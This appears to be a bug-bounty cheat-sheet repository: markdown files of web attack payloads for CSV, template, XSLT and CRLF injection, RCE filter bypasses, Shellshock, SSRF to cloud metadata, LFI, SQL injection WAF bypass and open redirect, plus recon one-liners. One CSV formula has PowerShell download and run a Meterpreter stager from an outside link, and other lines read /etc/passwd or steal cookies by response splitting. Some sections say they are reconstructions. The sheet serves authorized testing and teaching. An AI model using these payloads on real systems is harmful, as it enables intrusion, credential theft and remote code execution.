├── cheatsheets
│   ├── content-injection.md
│   ├── csv-injection.md
│   ├── template-injection.md
│   ├── xslt.md
│   ├── practice-platforms.md
│   ├── rce.md
│   ├── bugbountyplatforms.md
│   ├── cors.md
│   ├── ssrf.md
│   ├── recon.md
│   ├── lfi.md
│   ├── sqli.md
│   ├── special-tools.md
│   ├── bugbountytips.md
│   ├── crlf.md
│   ├── open-redirect.md
│   ├── xxe.md
│   ├── books.md
│   ├── crypto.md
│   └── xss.md
├── CONTRIBUTING.md
├── README.md
└── LICENSE

--------------------------------------------------------------------------------
/cheatsheets/content-injection.md:
--------------------------------------------------------------------------------

## Content Injection

```
❤ bounty pls
```

--------------------------------------------------------------------------------
/cheatsheets/csv-injection.md:
--------------------------------------------------------------------------------

## CSV Injection

Cells beginning with `=`, `+`, `-` or `@` are evaluated as formulas when an exported CSV is opened in a spreadsheet application. The DDE form `=cmd|'...'!A0` starts a process (Excel prompts the user before doing so, so the report should say that).

**Newline character**

A leading newline closes the current cell so the formula lands in a cell of its own:

```
%0A-3+3+cmd|' /C calc'!D2
```

**Meterpreter Shell**

The short link points at a third-party stager; host your own payload instead of relying on it.

```
=cmd|'/C powershell IEX(wget bit.ly/1X146m3)'!A0
```

--------------------------------------------------------------------------------
/cheatsheets/template-injection.md:
--------------------------------------------------------------------------------

## Template Injection

**Ruby**

ERB evaluates the backtick expression and renders the command output:

```ruby
<%=`id`%>
```

**Twig**

Twig casts the string `'7'` to a number, so the following payload should output `49`.

```
{{7*'7'}}
```

**Jinja**

Jinja2 keeps Python semantics (string repetition), so the same payload should output `7777777`. The difference between the two results is a quick way to tell the engines apart.

```
{{7*'7'}}
```

--------------------------------------------------------------------------------
/CONTRIBUTING.md:
--------------------------------------------------------------------------------

# Contributing

We welcome contributions from the public.

### Using the issue tracker 💡

The issue tracker is the preferred channel for bug reports and feature requests.
[![GitHub issues](https://img.shields.io/github/issues/EdOverflow/bugbounty-cheatsheet.svg?style=flat-square)](https://github.com/EdOverflow/bugbounty-cheatsheet/issues)

### Issues and labels 🏷

Our bug tracker utilizes several labels to help organize and identify issues.

### Guidelines for bug reports 🐛

Use the GitHub issue search — check if the issue has already been reported.

--------------------------------------------------------------------------------
/cheatsheets/xslt.md:
--------------------------------------------------------------------------------

## XSLT Injection

**Backend info**

Fingerprint the processor first; which extension functions you can call depends on it. Only the `xsl:vendor =` / `xsl:version =` labels survived in this copy; the `xsl:value-of` lines are the standard XSLT 1.0 `system-property()` lookups that produce those values and are reconstructed here.

```xml
<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
xsl:vendor = <xsl:value-of select="system-property('xsl:vendor')"/>
xsl:version = <xsl:value-of select="system-property('xsl:version')"/>
</xsl:template>
</xsl:stylesheet>
```

**Injecting in PHP**

PHP's `XSLTProcessor` exposes PHP functions to a stylesheet under the `http://php.net/xsl` namespace, but only when the application has called `registerPHPFunctions()`. The original payload body was lost in this copy; the stylesheet below is a reconstruction of that technique, and the file path is a placeholder.

```xml
<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
<xsl:template match="/">
<xsl:value-of select="php:function('file_get_contents', '/etc/passwd')"/>
</xsl:template>
</xsl:stylesheet>
```

--------------------------------------------------------------------------------
/cheatsheets/practice-platforms.md:
--------------------------------------------------------------------------------

## Practice Platforms

- [Pentesterlab](https://pentesterlab.com/)
- [XSS Game](https://xss-game.appspot.com/)
- [Hack This Site](https://www.hackthissite.org)
- [Root-Me](https://www.root-me.org)
- [HackTheBox](https://www.hackthebox.eu)
- [Hack Me](https://hack.me)
- [CTF 365](https://ctf365.com)
- [Google Gruyere](https://google-gruyere.appspot.com/)
- [OWASP Juice Shop](http://juice-shop.herokuapp.com/)
- [Hack Yourself First](http://hackyourselffirst.troyhunt.com/)
- [flAWS Cloud](http://flaws.cloud/)
- [bWAPP](http://www.itsecgames.com/)
- [OWASP Mutillidae](https://www.owasp.org/index.php/OWASP_Mutillidae_2_Project)
- [tryhackme](https://tryhackme.com/)
- [Portswigger Labs](https://portswigger.net/web-security/all-labs)

--------------------------------------------------------------------------------
/cheatsheets/rce.md:
--------------------------------------------------------------------------------

## RCE

**Werkzeug Debugger**

Find somewhere where user input can be supplied and submit the following string to cause an error. The middle character is a Cyrillic `і`, not an ASCII `i`; it is there to trigger a `UnicodeEncodeError` in Python 2 code paths so that the traceback page shows up:

```
strіng
```

If the target is running its application in debug mode, the Werkzeug traceback page includes an interactive Python console, which lets you run commands. The console is protected by a PIN in the format `***-***-***`. That PIN is not random: Werkzeug derives it from the username the application runs as, the module and application name, the path to the application's module file, the MAC address of a network interface and the machine ID. If you can read those values (for example through an LFI on the same host) you can recompute it offline, and if you are running the target locally you can read them directly. Guessing it online is rarely practical because the console locks itself after a small number of failed attempts.

**Basic Bypasses**

Quote insertion, backslash escapes, glob wildcards and brace expansion all reach the same binary while defeating filters that match on the literal command name or on spaces:

```
i'''d
i"""d
```

```
\l\s -l\a\h
```

```
cat /e?c/p?ss??
cat /e??/??ss*
```

```
{ls,}
{ls,-a}
```

**Shellshock Bug**

The function definition is the trigger; whatever follows the closing `};` is executed by a vulnerable bash when the string is imported as an environment variable (for example from the `User-Agent` header by a CGI script):

```bash
() { :;}; echo vulnerable
```

```zsh
curl -H "User-Agent: () { :; }; /bin/eject" http://example.com/
```

--------------------------------------------------------------------------------
/cheatsheets/bugbountyplatforms.md:
--------------------------------------------------------------------------------

## Bug Bounty Platforms

**Open For Signup**

- [HackerOne](https://www.hackerone.com/)
- [Bugcrowd](https://www.bugcrowd.com/)
- [BountyFactory](https://bountyfactory.io/)
- [Intigriti](https://intigriti.be/)
- [Bugbountyjp](https://bugbounty.jp/)
- [Safehats](https://safehats.com/)
- [BugbountyHQ](https://www.bugbountyhq.com/)
- [Hackerhive](https://hackerhive.io/)
- [Hackenproof](https://hackenproof.com/)
- [Hacktrophy](https://hacktrophy.com/)
- [CESPPA](https://www.cesppa.com/)

**Invite-based Platforms**

- [Synack](https://www.synack.com/red-team/)
- [Cobalt](https://cobalt.io/)
- [Zerocopter](https://zerocopter.com/)
- [Yogosha](https://www.yogosha.com/)
- [Bugbountyzone](https://bugbountyzone.com/)
- [Antihack.me](http://www.antihack.me/)
- [Vulnscope](https://www.vulnscope.com/)

--------------------------------------------------------------------------------
/cheatsheets/cors.md:
--------------------------------------------------------------------------------

## Cross Origin Resource Sharing (CORS)

Testing:
`curl --head -s 'http://example.com/api/v1/secret' -H 'Origin: http://evil.com'`

Note that `--head` sends a `HEAD` request; if the endpoint handles `HEAD` differently from `GET`, repeat the test with `curl -i` and a `GET`.

Check to see what the server responds with in the `Access-Control-Allow-Origin:` header (if anything) and, if so, check if `Access-Control-Allow-Credentials: true` is present.
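The probing and the decision behind that check, as an added Python example rather than code from the cheat sheet: `probe_origins()` builds the origins worth sending (an arbitrary origin, the target host embedded as a prefix or suffix of an attacker name to beat `startswith`/`endswith` checks, the host with a dot swapped to beat an unescaped regex, and `null`), and `classify_cors()` applies the browser's rules to a set of response headers. The response headers below are constructed for illustration, not captured from a real host, and `evil.com`/`evil` are assumed attacker names; no network call is made so the block runs offline.

```python
from urllib.parse import urlsplit


def probe_origins(target_url, attacker_domain="evil.com", attacker_label="evil"):
    """Origin values to send against target_url, one per common validation mistake."""
    host = urlsplit(target_url).hostname
    return [
        f"https://{attacker_domain}",            # arbitrary origin reflected as-is
        f"https://{host}.{attacker_domain}",     # passes a startswith(host) check
        f"https://{attacker_label}{host}",       # passes an endswith(host) check
        "https://" + host.replace(".", "-", 1),  # passes a regex whose '.' is unescaped
        "null",                                  # sent by sandboxed iframes and data: URLs
    ]


def classify_cors(sent_origin, headers):
    """Interpret the response headers the way a browser would for a credentialed request."""
    h = {k.lower(): v.strip() for k, v in headers.items()}
    acao = h.get("access-control-allow-origin")
    creds = h.get("access-control-allow-credentials", "").lower() == "true"
    if acao is None:
        return "no-cors"                  # cross-origin reads stay blocked
    if acao == "*":
        # Browsers refuse to expose a credentialed response behind a wildcard,
        # so '*' only ever leaks data that was public anyway.
        return "wildcard-public-only"
    if acao == sent_origin:
        return "reflected-with-credentials" if creds else "reflected-no-credentials"
    return "static-allowlist"             # server returned a fixed origin, not ours


# Constructed sample responses keyed by the Origin that was sent (illustrative only).
SAMPLE_RESPONSES = {
    "https://evil.com": {
        "Access-Control-Allow-Origin": "https://evil.com",
        "Access-Control-Allow-Credentials": "true",
    },
    "https://example.com.evil.com": {
        "Access-Control-Allow-Origin": "https://example.com.evil.com",
        "Access-Control-Allow-Credentials": "true",
    },
    "https://evilexample.com": {"Access-Control-Allow-Origin": "https://example.com"},
    "https://example-com": {},
    "null": {"Access-Control-Allow-Origin": "*"},
}


def run_probe(target_url, responses):
    """Map each probe origin to its classification; only 'reflected-with-credentials' is PoC-worthy."""
    return {o: classify_cors(o, responses.get(o, {})) for o in probe_origins(target_url)}


if __name__ == "__main__":
    for origin, verdict in run_probe("http://example.com/api/v1/secret", SAMPLE_RESPONSES).items():
        print(f"{origin:32} {verdict}")
```

Only the `reflected-with-credentials` verdict justifies hosting the HTML proof of concept below; a reflected origin without `Access-Control-Allow-Credentials: true` exposes only what an unauthenticated client could already fetch.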
If it is trusting arbitrary origins **with** allow-credentials set to true, then host this HTML as a proof of concept. (`Access-Control-Allow-Origin: *` together with credentials is not exploitable this way, because browsers reject credentialed responses that use the wildcard.)

Only the title and heading of the page survived in this copy; the markup below is a reconstruction of the usual PoC: a credentialed `XMLHttpRequest` to the endpoint tested above, whose body is displayed when the browser allows the page to read it.

```html
<!DOCTYPE html>
<html>
<head>
<title>BugBounty CheatSheet</title>
</head>
<body>
<h2>CORS PoC</h2>
<button type="button" onclick="cors()">Exploit</button>
<pre id="demo"></pre>
<script>
function cors() {
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
      // Only reached if the response carried a matching ACAO and ACAC: true
      document.getElementById("demo").textContent = this.responseText;
    }
  };
  xhttp.open("GET", "http://example.com/api/v1/secret", true);
  xhttp.withCredentials = true;  // send the victim's cookies
  xhttp.send();
}
</script>
</body>
</html>
```

--------------------------------------------------------------------------------
/cheatsheets/ssrf.md:
--------------------------------------------------------------------------------

## SSRF

Alternative spellings of an IP address that `inet_aton()`-style parsers accept but string-based allowlists and blocklists miss. All three of the following resolve to `127.0.0.1`:

```
http://0177.1/
```

```
http://0x7f.1/
```

```
http://127.000.000.1
```

A plain integer is accepted too (the example below is `31.13.91.36`; `127.0.0.1` is `2130706433`):

```
https://520968996
```

_Note:_ The latter can be calculated using http://www.subnetmask.info/

**Exotic Handlers**

Which of these work depends on the client library doing the fetch: curl speaks `gopher://`, `dict://` and `tftp://`, while `php://` and `jar://` are PHP stream wrappers and Java URL handlers respectively.

```
gopher://, dict://, php://, jar://, tftp://
```

**IPv6**

```
http://[::1]
```

```
http://[::]
```

**Wildcard DNS**

Wildcard DNS services resolve any name that embeds an IP address to that address, which gets an internal IP past hostname-based checks. (xip.io has since been shut down; nip.io offers the same service.)

```
10.0.0.1.xip.io
www.10.0.0.1.xip.io
mysite.10.0.0.1.xip.io
foo.bar.10.0.0.1.xip.io
```

_Link:_ http://xip.io

```
10.0.0.1.nip.io
app.10.0.0.1.nip.io
customer1.app.10.0.0.1.nip.io
customer2.app.10.0.0.1.nip.io
otherapp.10.0.0.1.nip.io
```

_Link:_ http://nip.io

**AWS EC2 Metadata**

```
http://169.254.169.254/latest/meta-data/
```

```
http://169.254.169.254/latest/meta-data/local-hostname
```

```
http://169.254.169.254/latest/meta-data/public-hostname
```

Instances that enforce IMDSv2 answer plain `GET` requests with `401`; they require a token obtained first with `PUT /latest/api/token` and an `X-aws-ec2-metadata-token-ttl-seconds` header, so a `GET`-only SSRF cannot read their metadata.

> If there is an IAM role associated with the instance, role-name is the name of the role, and role-name contains the temporary security credentials associated with the role [...]
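How a libc-style parser actually reads the alternative IP spellings listed at the top of this sheet, as an added Python example (not code from the cheat sheet): `parse_legacy_ipv4()` implements the `inet_aton()` rules (one to four dot-separated parts; each part decimal, octal with a leading `0`, or hex with `0x`; the last part fills the remaining bytes), `ipv4_variants()` enumerates the equivalent spellings for an address the way an attacker would, and `is_blocked_target()` is the check an SSRF filter needs: canonicalise first, then compare against blocked ranges. The blocked range list and the IPv4-only scope are assumptions of the example.

```python
import ipaddress


def _parse_part(s):
    """One component under inet_aton rules: 0x.. is hex, a leading 0 is octal, else decimal."""
    if s.lower().startswith("0x"):
        return int(s[2:], 16)
    if len(s) > 1 and s.startswith("0"):
        return int(s, 8)
    return int(s, 10)


def parse_legacy_ipv4(text):
    """Canonical dotted quad for any inet_aton()-accepted spelling, or None if not an IPv4 literal."""
    parts = text.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    try:
        nums = [_parse_part(p) for p in parts]
    except ValueError:
        return None
    # Every part but the last is one byte; the last one covers all remaining bytes.
    last_width = 4 - (len(nums) - 1)
    if any(not 0 <= n <= 255 for n in nums[:-1]):
        return None
    if not 0 <= nums[-1] < (1 << (8 * last_width)):
        return None
    value = 0
    for n in nums[:-1]:
        value = (value << 8) | n
    value = (value << (8 * last_width)) | nums[-1]
    return str(ipaddress.IPv4Address(value))


def ipv4_variants(dotted):
    """Equivalent spellings of a dotted-quad address; all parse back to the same host."""
    a, b, c, d = (int(x) for x in dotted.split("."))
    as_int = (a << 24) | (b << 16) | (c << 8) | d
    return [
        str(as_int),                              # decimal integer (2130706433)
        f"0x{as_int:08x}",                        # hex integer
        f"0{as_int:o}",                           # octal integer
        f"0{a:o}.{as_int & 0xFFFFFF}",            # octal first byte, rest as one number (0177.1)
        f"0x{a:02x}.{as_int & 0xFFFFFF}",         # hex first byte (0x7f.1)
        f"0{a:o}.0{b:o}.0{c:o}.0{d:o}",           # zero-padded octets are read as octal
    ]


# Assumed blocklist for an SSRF filter: loopback, RFC 1918, link-local (incl. the
# 169.254.169.254 metadata endpoint) and the "this network" range.
BLOCKED = [ipaddress.ip_network(n) for n in (
    "127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12",
    "192.168.0.0/16", "169.254.0.0/16", "0.0.0.0/8",
)]


def is_blocked_target(host):
    """Filter check: canonicalise every spelling before comparing against blocked ranges.
    Hostnames return False here; DNS resolution and rebinding need their own handling."""
    canonical = parse_legacy_ipv4(host)
    if canonical is None:
        return False
    addr = ipaddress.IPv4Address(canonical)
    return any(addr in net for net in BLOCKED)


if __name__ == "__main__":
    for spelling in ["0177.1", "0x7f.1", "127.000.000.1", "520968996"] + ipv4_variants("169.254.169.254"):
        print(f"{spelling:20} -> {parse_legacy_ipv4(spelling)}  blocked={is_blocked_target(spelling)}")
```

A filter that compares the raw string against `"127.0.0.1"` or `"169.254.169.254"` passes every one of these spellings; the same filter applied to `parse_legacy_ipv4()`'s output does not.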
_Link:_ http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html (source of the quote above; includes a comprehensive Instance Metadata Categories table)

--------------------------------------------------------------------------------
/cheatsheets/recon.md:
--------------------------------------------------------------------------------

# Certspotter

Pull every name from certificates issued for the domain, strip quotes and wildcard prefixes, and deduplicate (`sort -u` rather than a bare `uniq`, which only drops adjacent duplicates):

```zsh
curl https://certspotter.com/api/v0/certs\?domain\=example.com | jq '.[].dns_names[]' | sed 's/\"//g' | sed 's/\*\.//g' | sort -u
```

The same list resolved and port-scanned in one go (`-sS` needs root, `-T5` is noisy, and `-iL -` reads the targets from stdin):

```zsh
curl https://certspotter.com/api/v0/certs\?domain\=example.com | jq '.[].dns_names[]' | sed 's/\"//g' | sed 's/\*\.//g' | sort -u | dig +short -f - | sort -u | nmap -T5 -Pn -sS -iL - -p 80,443,21,22,8080,8081,8443 --open -n -oG -
```

# Sublist3r One-liner

This runs [Sublist3r](https://github.com/aboul3la/Sublist3r) on a list of domains and outputs the results in separate files (`-I {}` is the non-deprecated spelling of xargs' `-i{}`).

```
. <(cat domains | xargs -n1 -I{} python sublist3r.py -d {} -o {}.txt)
```

# [Apktool](https://ibotpeaches.github.io/Apktool/) to [LinkFinder](https://github.com/GerbenJavado/LinkFinder)

Decodes the APK, copies every smali file into one directory under a random name (same-named files from different packages would otherwise overwrite each other; `md5` is the macOS command, use `md5sum` on Linux) and runs LinkFinder over the collection:

```
apktool d app.apk; cd app;mkdir collection; find . \
    -name \*.smali -exec sh -c "cp {} collection/\$(head /dev/urandom | md5 | cut -d' ' -f1).smali" \;; linkfinder -i 'collection/*.smali' -o cli
```

# [Aquatone](https://github.com/michenriksen/aquatone/) One-liner

```
$ echo "aquatone-discover -d \$1 && aquatone-scan -d \$1 --ports huge && aquatone-takeover -d \$1 && aquatone-gather -d \$1" >> aqua.sh && chmod +x aqua.sh
$ ./aqua.sh domain.com
```

# [relative-url-extractor](https://github.com/jobertabma/relative-url-extractor)

```
$ ruby extract.rb demo-file.js
$ ruby extract.rb https://hackerone.com/some-file.js
$ ruby extract.rb '|cat demo-file.js' -c
```

--------------------------------------------------------------------------------
/cheatsheets/lfi.md:
--------------------------------------------------------------------------------

## LFI

**Filter Bypass**

Mixed slashes, a leading separator and a URL-encoded backslash (`%5c`) get past filters that only strip or reject the literal `../` sequence:

```
../\
```

```
..\/
```

```
/..
```

```
\/..
```

```
/%5c..
```

**FFmpeg Local File Disclosure**

This [script](https://github.com/neex/ffmpeg-avi-m3u-xbin/blob/master/gen_xbin_avi.py) by @neex can be used to disclose local files on FFmpeg hosts which parse externally-referencing [HLS playlists](https://ffmpeg.org/ffmpeg-formats.html#hls-2).

_Steps to reproduce_

1. Download the script from @neex to your "attacker" instance.
2. Execute the script with your desired parameters: `python3 gen_xbin_avi.py file:///etc/hostname bugbounty.avi`
3. Upload the generated AVI file to your target site (e.g. within a 'video upload page').
4. The target may process the malicious HLS inclusion with FFmpeg on the server side.
5. Play the uploaded AVI via the target site. If successful, your desired file will be disclosed within the video.
Alternative scripts exist which may generate different HLS formats or lead to the desired file being disclosed in a different manner.

**Blogs**
* http://pastie.org/840199
* http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/
* http://www.notsosecure.com/folder2/2010/08/20/lfi-code-exec-remote-root/?utm_source=twitterfeed&utm_medium=twitter
* http://labs.neohapsis.com/2008/07/21/local-file-inclusion-%E2%80%93-tricks-of-the-trade/
* http://www.digininja.org/blog/when_all_you_can_do_is_read.php

--------------------------------------------------------------------------------
/cheatsheets/sqli.md:
--------------------------------------------------------------------------------

## SQLI

**Akamai Kona Bypass**

Each substitution keeps the MySQL semantics while avoiding a token the WAF signature matches on:

* `MID` instead of `SUBSTRING`
* `LIKE` instead of `=`
* `/**/` instead of a `space`
* `CURRENT_USER` instead of `CURRENT_USER()`
* `"` instead of `'`

Final example (a boolean condition on the first character of the connected user's name):

```sql
444/**/OR/**/MID(CURRENT_USER,1,1)/**/LIKE/**/"p"/**/#
```

**Blogs**

* http://pentestmonkey.net/blog/mssql-sql-injection-cheat-sheet/
* http://isc.sans.edu/diary.html?storyid=9397
* http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
* http://xd-blog.com.ar/descargas/manuales/bugs/full-mssql-injection-pwnage.html
* http://securityoverride.com/articles.php?article_id=1&article=The_Complete_Guide_to_SQL_Injections
* http://websec.wordpress.com/2010/03/19/exploiting-hard-filtered-sql-injections/
* http://sqlzoo.net/hack/
* http://www.sqlteam.com/article/sql-server-versions
* http://www.krazl.com/blog/?p=3
* http://www.owasp.org/index.php/Testing_for_MS_Access
* http://web.archive.org/web/20101112061524/http://seclists.org/pen-test/2003/May/0074.html
* http://web.archive.org/web/20080822123152/http://www.webapptest.org/ms-access-sql-injection-cheat-sheet-EN.html
* http://www.youtube.com/watch?v=WkHkryIoLD0
* http://layerone.info/archives/2009/Joe%20McCray%20-%20Advanced%20SQL%20Injection%20-%20L1%202009.pdf
* http://vimeo.com/3418947
* http://sla.ckers.org/forum/read.php?24,33903
* http://websec.files.wordpress.com/2010/11/sqli2.pdf
* http://old.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/
* http://ha.ckers.org/sqlinjection/
* http://lab.mediaservice.net/notes_more.php?id=MSSQL

--------------------------------------------------------------------------------
/cheatsheets/special-tools.md:
--------------------------------------------------------------------------------

## Special Tools

**Resolution**

Out-of-band endpoints for confirming blind SSRF, XXE or command injection: a DNS lookup or HTTP request to one of these proves the target fetched your payload even when nothing is reflected.

- http://dnsbin.zhack.ca (DNS)
- http://pingb.in (DNS)
- https://www.mockbin.org/ (HTTP)

**Wildcard DNS**

- http://xip.io

```
10.0.0.1.xip.io
www.10.0.0.1.xip.io
mysite.10.0.0.1.xip.io
foo.bar.10.0.0.1.xip.io
```

- http://nip.io

```
10.0.0.1.nip.io
app.10.0.0.1.nip.io
customer1.app.10.0.0.1.nip.io
customer2.app.10.0.0.1.nip.io
otherapp.10.0.0.1.nip.io
```

**Reconnaissance**

- https://spyse.com (fully-fledged recon service)
- https://dnsdumpster.com (DNS and subdomain recon)
- [Reverse IP Lookup](http://reverseip.domaintools.com/) (Domainmonitor)
- [Security headers](https://securityheaders.io/) (Security Report, missing headers)
- http://threatcrowd.org (WHOIS, DNS, email, and subdomain recon)
- https://mxtoolbox.com (wide range of DNS-related recon tools)
- https://publicwww.com/ (Source Code Search Engine)
- http://ipv4info.com/ (Find domains in the IP block owned by a Company/Organization)
- [HackerTarget Tools](https://hackertarget.com/ip-tools/) (DNS recon, site lookup, and scanning tools)
- [VirusTotal](https://virustotal.com/en-gb/domain/google.com/information/) (WHOIS, DNS, and subdomain recon)
- [crt.sh](https://crt.sh/?q=%25.uber.com) (SSL certificate search)
- [Google CT](https://transparencyreport.google.com/https/certificates) (SSL certificate transparency search)
- [PenTest Tools](https://pentest-tools.com/information-gathering/google-hacking) (Google dorks)
- [Wayback Machine](https://archive.org/web/) (Find stuff which was hosted on the domain in the past)
- [FindSubdomains](https://findsubdomains.com/) (Find subdomains using domain or keywords)

**Report Templates**

- https://github.com/fransr/template-generator
- https://github.com/ZephrFish/BugBountyTemplates

--------------------------------------------------------------------------------
/cheatsheets/bugbountytips.md:
--------------------------------------------------------------------------------

## Bug Bounty Tips

**Tip #1**

Use GIT as a recon tool. Find the target's GIT repositories, clone them, and then check the logs for information on the team not necessarily in the source code. Say the target is Reddit and I want to see which developers work on certain projects.

[Link](https://gist.github.com/EdOverflow/a9aad69a690d97a8da20cd4194ca6596)

**Tip #2**

Look for GitLab instances on targets or belonging to the target. When you stumble across the GitLab login panel, navigate to `/explore`. Misconfigured instances do not require authentication to view the internal projects. Once you get in, use the search function to find passwords, keys, etc. This is a pretty big attack vector and I am finally revealing it today, because I am sure it will help a lot of you get some critical issues.

**Tip #3**

Bug bounty tip: test applications of a company that cost money or require manual setup. Chances are only a few, if any, will have tested them, leaving them vulnerable.
**Tip #4**

If you've found an IDOR where you're able to change data of others, then don't jump out of your seat to report it. Modify it to an XSS payload, and if inputs are not sanitized and variables are echoed without getting escaped, then IDOR > XSS > ATO.

**Tip #5**

Look for *hackathon-related* assets. What I mean by this is sometimes companies run hackathons and give attendees special access to certain API endpoints and/or temporary credentials. I have found GIT instances that were set up for hackathons full of information that allowed me to find more issues in the target several times.

**Tip #6**

Keep all your directory brute force results so when a CVE like Drupalgeddon2 comes out, you can look for previously found instances (`cat dirsearch/reports/*/* | grep INSTALL.mysql.txt | grep 200 | less`).

**Tip #7**

When you have a form, always try to change the request method from POST to GET in order to improve the CVSS score.
For example, demonstrating that a CSRF can be exploited simply by using an `<img>` tag is better than having to send a link to the victim.
--------------------------------------------------------------------------------
/cheatsheets/crlf.md:
--------------------------------------------------------------------------------

## CRLF Injection || HTTP Response Splitting

A bare carriage return is sometimes enough to start a new header line; this one plants an attacker-chosen CSRF token cookie:

```
%0dSet-Cookie:csrf_token=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
```

**Header-based test, site root**

Look for `header: header` in the response headers. The variants cover bare CR or LF, a preceding `#` or `?` (to end the path the server copies into `Location`), single and double percent-encoding, and the IIS-style `%u000a` form.

```
%0d%0aheader:header
```
```
%0aheader:header
```
```
%0dheader:header
```
```
%23%0dheader:header
```
```
%3f%0dheader:header
```

```
/%250aheader:header
```

```
/%25250aheader:header
```

```
/%%0a0aheader:header
```

```
/%3f%0dheader:header
```

```
/%23%0dheader:header
```

```
/%25%30aheader:header
```

```
/%25%30%61header:header
```

```
/%u000aheader:header
```

**CRLF chained with Open Redirect server misconfiguration**

_Note:_ This sometimes works. (Discovered in some Yandex sites, was not exploitable from the root.)

```
//www.google.com/%2f%2e%2e%0d%0aheader:header
```
```
/www.google.com/%2e%2e%2f%0d%0aheader:header
```
```
/google.com/%2F..%0d%0aheader:header
```

**Twitter specific CRLF** by [@filedescriptor](http://blog.innerht.ml/twitter-crlf-injection/)

The two characters are U+560A and U+560D in UTF-8; when the server narrows them to a single-byte encoding only the low byte survives, which is `0x0A` (LF) and `0x0D` (CR).

```
%E5%98%8A%E5%98%8Dheader:header
```

**CRLF Injection to XSS**

The response is split and rewritten as a chunked body: `23` is the hex chunk size (35 bytes, matching the `Content-Length`) of the `<svg>` tag, `0` ends the chunks, and `/%2e%2e` pushes the rest of the original response out of the way. The `<svg>` element was stripped out of this copy and is restored here.

```
%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2e%2e
```

**Response splitting on 302 Redirect, before Location header** (Discovered in DoD)

```
%0d%0aContent-Type:%20text%2fhtml%0d%0aHTTP%2f1.1%20200%20OK%0d%0aContent-Type:%20text%2fhtml%0d%0a%0d%0a%3Cscript%3Ealert('XSS');%3C%2fscript%3E
```

**Response splitting on 301 code, chained with Open Redirect to corrupt location header and to break 301** by [@black2fan](https://twitter.com/black2fan) (Facebook bug)

_Note:_ `xxx:1` was used for breaking the open redirect destination (`Location` header). A great example of how to escalate CRLF to XSS on a seemingly unexploitable 301 status code.

```
%2Fxxx:1%2F%0aX-XSS-Protection:0%0aContent-Type:text/html%0aContent-Length:39%0a%0a%3cscript%3ealert(document.cookie)%3c/script%3e%2F..%2F..%2F..%2F../tr
```

--------------------------------------------------------------------------------
/cheatsheets/open-redirect.md:
--------------------------------------------------------------------------------

## Open Redirect

Each payload survives a check that the value "starts with `/`" and is then read by the browser as an absolute URL: a tab (`%09`) is stripped by the browser's URL parser, a backslash (`\` or `%5c`) is treated as a slash in `http(s)` URLs, a leading `//` is a protocol-relative URL, and `%40` (`@`) turns the apparent host into user-info.

```
/%09/google.com
```

```
/%5cgoogle.com
```

```
//www.google.com/%2f%2e%2e
```

```
//www.google.com/%2e%2e
```

```
//google.com/
```

```
//google.com/%2f..
```

```
//\google.com
```

```
/\victim.com:80%40google.com
```

## Possible open redirect parameters

```
?url=http://{target}
?url=https://{target}
?url=//{target}
?url=%2f%2f{target}
```

```
?next=http://{target}
?next=https://{target}
?next=//{target}
?next=%2f%2f{target}
```

```
/redirect/{target}
```

```
/cgi-bin/redirect.cgi?{target}
```

```
/out/{target}
/out?{target}
/out?/{target}
/out?//{target}
/out?/\{target}
/out?///{target}
```

```
?view={target}
?view=/{target}
?view=//{target}
?view=/\{target}
?view=///{target}
```

```
/login?to={target}
/login?to=/{target}
/login?to=//{target}
/login?to=/\{target}
/login?to=///{target}
```

**Open Redirect Payloads** by @cujanovic

https://github.com/cujanovic/Open-Redirect-Payloads

**Open Redirect Parameters** by @fuzzdb-project

https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/redirect/redirect-urls-template.txt
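Why the payloads above get past a `startswith('/')` check, and what a check that holds up looks like, as an added Python example (not code from the cheat sheet): `browser_view()` applies the two WHATWG URL parsing rules that matter here (ASCII tab and newline are removed, and in `http(s)` URLs a backslash is a path separator), `naive_is_local()` is the usual flawed check, and `is_local_redirect()` is the hardened one: decode the parameter once the way the server does, normalise it the way the browser will, and only then require a path-only URL with no scheme and no authority. The payload list is the one from this sheet; the ordering of the checks and the single decode are the example's own design assumptions.

```python
from urllib.parse import unquote, urlsplit

# Redirect values from the sheet above (attacker input as it arrives at the server).
PAYLOADS = [
    "/%09/google.com",
    "/%5cgoogle.com",
    "//www.google.com/%2f%2e%2e",
    "//www.google.com/%2e%2e",
    "//google.com/",
    "//google.com/%2f..",
    "//\\google.com",
    "/\\victim.com:80%40google.com",
]

_C0_AND_SPACE = "".join(chr(c) for c in range(0x21))


def browser_view(location):
    """Approximate how a browser reads a Location value before resolving it (WHATWG URL):
    leading/trailing C0 controls and spaces are dropped, ASCII tab/newline are removed
    anywhere, and '\\' is treated as '/' for http(s) URLs."""
    s = location.strip(_C0_AND_SPACE)
    s = s.replace("\t", "").replace("\n", "").replace("\r", "")
    return s.replace("\\", "/")


def naive_is_local(value):
    """The check that lets most of PAYLOADS through: it looks at the raw, undecoded string."""
    return value.startswith("/") and not value.startswith("//")


def is_local_redirect(value):
    """Hardened check: decode like the server, normalise like the browser, then insist on
    a relative path (no scheme, no authority, no leading '//')."""
    seen = browser_view(unquote(value))
    parts = urlsplit(seen)
    if parts.scheme or parts.netloc:
        return False
    return seen.startswith("/") and not seen.startswith("//")


def evaluate(payloads=PAYLOADS):
    """For each payload: (passes the naive check, passes the hardened check)."""
    return {p: (naive_is_local(p), is_local_redirect(p)) for p in payloads}


if __name__ == "__main__":
    for payload, (naive, hardened) in evaluate().items():
        print(f"{payload:32} naive={naive!s:5} hardened={hardened!s:5} browser sees {browser_view(unquote(payload))}")
```

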